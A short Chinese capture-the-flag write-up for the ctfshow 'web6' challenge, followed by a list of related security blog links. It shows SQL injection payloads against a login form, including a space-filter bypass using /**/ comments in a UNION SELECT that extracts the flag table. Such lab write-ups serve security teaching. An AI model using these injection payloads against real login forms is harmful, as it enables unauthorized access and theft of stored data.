ctfshow-web6

Wcbddd2023-08-07 16:02

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码 
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码 
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
2301_780789661 分钟前
高防cdn如何缓存网页静态资源
java·spring·web安全·缓存·kubernetes·ddos
宋浮檀s3 小时前
应急响应——分场景综合演练
网络·安全·web安全
HackTwoHub4 小时前
AI赋能Chrome MCP × JS逆向Skill自动化JS逆向挖洞
javascript·人工智能·chrome·安全·web安全·网络安全·自动化
AIDABI6 小时前
Vulnhub-DC-9
web安全·网络安全
2301_780789666 小时前
网站被 DDoS 攻击的过程和应对方案
网络·安全·web安全·架构·kubernetes·ddos
CTO Plus技术服务中8 小时前
自研-网络安全自动化应急响应工具系统(NSRT)
安全·web安全·自动化
上海云盾第一敬业销售9 小时前
高防CDN架构解析与实战经验
web安全·架构·ddos
CTO Plus技术服务中9 小时前
资产暴露面管理系统(AEMS)
安全·web安全·www.mdrsec.com·ctoplus技术服务栈
宋浮檀s1 天前
春秋云镜——CVE-2022-22965
网络·安全·web安全·网络安全
石像鬼₧魂石1 天前
SMBGhost (CVE-2020-0796) 复现命令速查表
web安全
热门推荐
01GitHub 镜像站点02DeepSeek V4 + Claude Code thinking mode 400 错误修复方案03Codex 接入 DeepSeek API 完整配置文档04【AI】2026 年具身智能模型和世界模型总结05【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南082026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10Windows端Codex接入第三方模型(DeekSeek,BaiLian)